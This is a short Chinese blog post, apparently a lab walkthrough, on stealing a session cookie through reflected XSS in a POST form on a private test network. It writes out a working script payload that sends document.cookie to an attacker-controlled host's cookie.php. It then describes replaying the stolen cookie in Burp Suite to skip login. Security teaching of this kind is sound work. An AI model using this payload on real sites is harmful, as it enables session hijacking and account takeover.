反射型xss的post请求获取cookie

攻击者构造的网站地址：192.168.10.12:100
受害者主机：192.168.10.134
目标服务器：192.168.10.1
步骤一：
受害者主机访问目标服务器

根据提示登录
步骤二：
输入xss Payload
<script>document.location = 'http://192.168.10.12:100/pkxss/xcookie/cookie.php?cookie='+document.cookie</script>
点击”submit“
步骤三：
访问攻击者网站，点击查看获取的cookie

步骤四：
用另外的浏览器访问目标服务器，并用burpsuit进行拦截，将拦截的数据中的cookie用步骤三中获取的cookie替换，然后放行，可以看见页面未登录直接跳转。

如图，越过成功。

posted @ 2024-03-01 17:45 LaiBuNiZi 阅读(109) 评论(0) 编辑收藏举报

刷新页面返回顶部

登录后才能查看或发表评论，立即登录或者逛逛博客园首页

【推荐】还在用 ECharts 开发大屏？试试这款永久免费的开源 BI 工具！
【推荐】国内首个AI IDE，深度理解中文开发场景，立即下载体验Trae
【推荐】编程新体验，更懂你的AI，立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包，你的智能百科全书，全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell：AI 加持，快人一步

相关博文：

· xss利用之盗取cookie示例

· xss跨站脚本攻击(一)

· 反射XSS——构造payload

· dvwa xss reflected (low)

· XSS攻击笔记（下）

阅读排行：
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码，我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了，比商业数据库还牛
· 白话解读 Dapr 1.15：你的「微服务管家」又秀新绝活了
· 上周热点回顾（2.24-3.2）